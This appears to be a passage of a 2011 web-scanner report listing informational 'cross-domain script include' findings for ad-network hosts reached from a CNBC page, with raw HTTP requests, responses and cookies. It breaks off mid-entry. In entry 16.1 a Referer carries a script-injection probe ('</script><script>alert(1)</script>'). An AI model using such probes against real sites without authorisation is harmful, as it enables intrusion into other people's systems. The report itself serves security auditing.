http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://radiumone.com/
http://reviews.homedepot.com/1999q/202642971/reviews.htm
http://reviews.homedepot.com/1999s/202642971/reviews.htm
http://rs.gwallet.com/r1/pixel/x9r8101111
http://rs.gwallet.com/r1/pixel/x9r8962146
http://search.cnbc.com/main.do
http://soundcloud.com/
http://soundcloud.com/help
http://soundcloud.com/help/premium-accounts
http://soundcloud.com/premium
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/
http://www.cnbc.com/
http://www.cnbc.com/id/43422860
http://www.creditcards.com/0-apr-credit-cards.php
http://www.creditcards.com/instant-approval.php
http://www.egov.com/Pages/default.aspx
http://www.egov.com/Solutions/Funding/Pages/default.aspx
http://www.egov.com/Solutions/Pages/default.aspx
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/widgets/recommendations.php
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation
http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate
http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay
http://www.ilslaunch.com/mission-control/mission-skyterra-1
http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/
http://www.lightsquared.com/uncategorized/welcome-to-insights/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

16.1. http://a.rfihub.com/sed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/sed

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305514608;click=http://a.rfihub.com/acs/127_1_YWE9MTk3ODksOTA0NjEsMTkzNzAsMTg2MjU0MSwxNTA0LDIzMjUyLFhWcktLcjNxQ3Q3NixwLDkwMSwzNzg4LDUxMjU5LDIzOTAsODY2MSZyYj00NDUmcmU9MTIzODcX
http://b.scorecardresearch.com/beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6=

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: g="aABgmj8uw==BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAGG0IReg==AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC7BDsnw==AE9479AN1294103956000AAABL-SS69A=AE8438AN1275963655000AAABL-SS69A="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABpVi0zA==AI89bBrQ==AAABL_5mTvg="; f="aAC9KJdew==AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: g="aADDdMBBg==BCaXVrKKr3qCt76|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V4HA=BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: u="aABrHtwfA==AI89bBrQ==AAABMJ0V4HA=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: c="aAMAMJ_Rg==AFd1504AB2AAABMJ0V4HA=AFv3788AB2AAABMJ0V4HA=AGu23252AB2AAABMJ0V4HA=AGt23252AB2AAABMJ0V4HA=AGb19789AB2AAABMJ0V4HA=AGa19789AB2AAABMJ0V4HA=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: f="aADF8vybA==AK1308305514AB2AAABMJ0V4HA=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: s="aAC0rUkZw==AE9479AN1294103956000AAABMJ0V4HA=AE8438AN1275963655000AAABMJ0V31c=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT;Max-Age=47347200
Set-Cookie: e=cl;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:11:54 GMT
Content-Length: 1983

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305514608;click=http://a.rfihub.com/acs/127_1_YWE9MTk3ODksOTA0NjEsMTkzNzAsMTg2MjU0MSwxNTA0LDIzMjUyLFhWcktLcjNxQ3Q3NixwLDkwMSwzNzg4LDUxMjU5LDIzOTAsODY2MSZyYj00NDUmcmU9MTIzODcX">
</SCRIPT>
...[SNIP]...
</noscript><script src="http://b.scorecardresearch.com/beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6="></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q2/728/11250463764@x90?http://a.tribalfusion.com/h.click/agmOQKpTf42bvUWUJGW673Rqf4SVUpStYM1WrpT6My4GQXXFZbLT6Ts4PYcRmMC3droXdQAnd6y4AZbQ3sr9UsU8VGjkSmvoUtQRWrBP3rTsUqrvVTniPEBJSsFCPUmpSW7cVGYW5UTxmHasXq2v2WMZdSVFH4AvKmW6mTtZbh0crUdkZctZca/

Request

GET /p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aXmOQK5t6N4mFZdmb3ZaXcfS1VJYXs7OpTrV3rJWTFfBUmnYPTbYQsrnQtBxYdvmWP3N4GQUXUnZbUP6o2PU7Qm7F3t3p1tMAntIM36MY5cbaVcQjWcF7SAFNUHQ3UUr02r2oVaQnWEMlQqQZaSVbIPF6vPWQdWcUR2rXtmHeO0tqIdkZcnjF/2546166/wrapper1.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a1nAGsMwTPfKbarmnZbakcwbNPYql16iWIf2wYkSRUxLTOdZatDqv7F6niX3NnnvrTdHym4fZa7Ab9H0B1g7qYZc16CNU91nTQUiUYNxYdcXp7dcsi7Zc6oGHbX1C9LyAJaZae7tFCw0IAjEPKI16y49LjZdKbd7jKyElKQmAXSZadsnDr2lZck7yZd37ZcdXJeiXPyJwRGIY725O76qq3WHZavXyZcgkmlKZdDMquDCV5ZbZbDZdmZcMq2c53YOxk166Cj77ZaKZbPrknxNfWf7aZcLnwnnHGjj8I19CvrlW4H6D01O1E4s3AZaiKkJmqrlZaV41YJbC97vkYxZbKhuuXUcbZdKRuloTELqZbBCFiiCUoJ1fpc8xI0L6pn6byrmec2feZaOTS9p0MCSqorZdaM8lg8vwcTQqZdVM67k02TjmucgEtWZawZcdEHdNZdQ1HQpxi8Qxy2u3iaZbJLWENr2c3RVux7n54yZasVQ5OoxgqDwl4c0GbwB3nmxsF7mebgH1JKQj2ElRclm1auFOGWJCDdmx0kufWb7h9K1rP7Iifps15

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 348
Expires: 0
Connection: keep-alive

<script LANGUAGE='JavaScript1.1' SRC='http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q2/728/11250463764@x90?http://a.tribalfusion.com/h.click/agmOQKpTf42bvUWUJGW673Rqf4SVUpStYM1WrpT6My4GQXXFZbLT6Ts4PYcRmMC3droXdQAnd6y4AZbQ3sr9UsU8VGjkSmvoUtQRWrBP3rTsUqrvVTniPEBJSsFCPUmpSW7cVGYW5UTxmHasXq2v2WMZdSVFH4AvKmW6mTtZbh0crUdkZctZca/'></script>

16.3. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5387288.7

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=62126627&AR_C=42474885
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5282
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 14:08:57 GMT
Expires: Thu, 16 Jun 2011 14:08:57 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;62126627;239242795;42474885&migRandom=7939479&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=62126627&AR_C=42474885"></script>
...[SNIP]...

16.4. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.specificmedia.com/B4970757.3

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57847894&advid=2179194&sid=366614&adid=
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

16.5. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.specificmedia.com/B4970757.4

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57847895&advid=2179194&sid=366614&adid=

Request

Response

16.6. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498?

Request

Response

16.7. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308305454%3Bdct=;ord=1308305454?

Request

Response

16.8. http://cas.criteo.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cas.criteo.com
Path:	/delivery/afr.php

Issue detail

The response dynamically includes the following script from another domain:

http://pixel.adsafeprotected.com/jspix?anId=124&pubId=test2&advId=netflix&campId=banner

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Thu, 16 Jun 2011 13:08:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: OACBLOCK=; expires=Sat, 16-Jul-2011 13:08:02 GMT; path=/
Set-Cookie: OACCAP=; expires=Sat, 16-Jul-2011 13:08:02 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Set-Cookie: udc=*1CHZCRgIx6nSg3nCboPSuV5GDm6LZbYWApuRyCJPc%2bhchb5KpLbYf1Lu3OAJhT9WT3pwfiRHdLJOgnKf1ltoJegC3En0YtacsPpePTD4Vs%2femUcMNCMz2iyF3TS35px7NaUtIpAen77OgY4z8Fw92jSb5amVKhnzpAgWyOIczt3gvErTOrDuHbNuDjHOBlH30xvNbTy74RniR04mX6Oj1XZN%2feyZMFLdzAqv49%2f%2fIw4I%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:02 GMT; path=/
Set-Cookie: udi=*1wQWNbHL2BkixwAS4DgWF1g%3d%3d; domain=.criteo.com; expires=Fri, 17-Jun-2011 13:08:02 GMT; path=/
Content-Length: 3170

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<a h
...[SNIP]...
<div style="position: absolute; left: 0px; top: 0px; visibility: hidden;"><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=124&pubId=test2&advId=netflix&campId=banner"></script>
...[SNIP]...

16.9. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Issue detail

The response dynamically includes the following script from another domain:

http://adadvisor.net/adscores/g.js?sid=9239766368

Request

GET /media/1956006/frame.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308233327911&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a1nAGsMwTPfKbarmnZbakcwbNPYql16iWIf2wYkSRUxLTOdZatDqv7F6niX3NnnvrTdHym4fZa7Ab9H0B1g7qYZc16CNU91nTQUiUYNxYdcXp7dcsi7Zc6oGHbX1C9LyAJaZae7tFCw0IAjEPKI16y49LjZdKbd7jKyElKQmAXSZadsnDr2lZck7yZd37ZcdXJeiXPyJwRGIY725O76qq3WHZavXyZcgkmlKZdDMquDCV5ZbZbDZdmZcMq2c53YOxk166Cj77ZaKZbPrknxNfWf7aZcLnwnnHGjj8I19CvrlW4H6D01O1E4s3AZaiKkJmqrlZaV41YJbC97vkYxZbKhuuXUcbZdKRuloTELqZbBCFiiCUoJ1fpc8xI0L6pn6byrmec2feZaOTS9p0MCSqorZdaM8lg8vwcTQqZdVM67k02TjmucgEtWZawZcdEHdNZdQ1HQpxi8Qxy2u3iaZbJLWENr2c3RVux7n54yZasVQ5OoxgqDwl4c0GbwB3nmxsF7mebgH1JKQj2ElRclm1auFOGWJCDdmx0kufWb7h9K1rP7Iifps15

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Content-Length: 98
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Date: Thu, 16 Jun 2011 14:08:52 GMT
Connection: close
Vary: Accept-Encoding
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<script type="text/javascript" src="http://adadvisor.net/adscores/g.js?sid=9239766368"></script>

16.10. http://cdn5.tribalfusion.com/media/2516896//frm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/2516896//frm.html

Issue detail

The response dynamically includes the following script from another domain:

http://rd.rlcdn.com/rd?type=js&site=108544

Request

GET /media/2516896//frm.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308233327911&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a1nAGsMwTPfKbarmnZbakcwbNPYql16iWIf2wYkSRUxLTOdZatDqv7F6niX3NnnvrTdHym4fZa7Ab9H0B1g7qYZc16CNU91nTQUiUYNxYdcXp7dcsi7Zc6oGHbX1C9LyAJaZae7tFCw0IAjEPKI16y49LjZdKbd7jKyElKQmAXSZadsnDr2lZck7yZd37ZcdXJeiXPyJwRGIY725O76qq3WHZavXyZcgkmlKZdDMquDCV5ZbZbDZdmZcMq2c53YOxk166Cj77ZaKZbPrknxNfWf7aZcLnwnnHGjj8I19CvrlW4H6D01O1E4s3AZaiKkJmqrlZaV41YJbC97vkYxZbKhuuXUcbZdKRuloTELqZbBCFiiCUoJ1fpc8xI0L6pn6byrmec2feZaOTS9p0MCSqorZdaM8lg8vwcTQqZdVM67k02TjmucgEtWZawZcdEHdNZdQ1HQpxi8Qxy2u3iaZbJLWENr2c3RVux7n54yZasVQ5OoxgqDwl4c0GbwB3nmxsF7mebgH1JKQj2ElRclm1auFOGWJCDdmx0kufWb7h9K1rP7Iifps15

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 14:08:52 GMT
Content-Length: 1378
Connection: close
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<html>
<head>
<script type="text/javascript" src="http://rd.rlcdn.com/rd?type=js&site=108544"></script>
</head>
<body>
<script type="text/javascript">
var segMap = [
[ 40380496
...[SNIP]...

16.11. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

Issue detail

The response dynamically includes the following script from another domain:

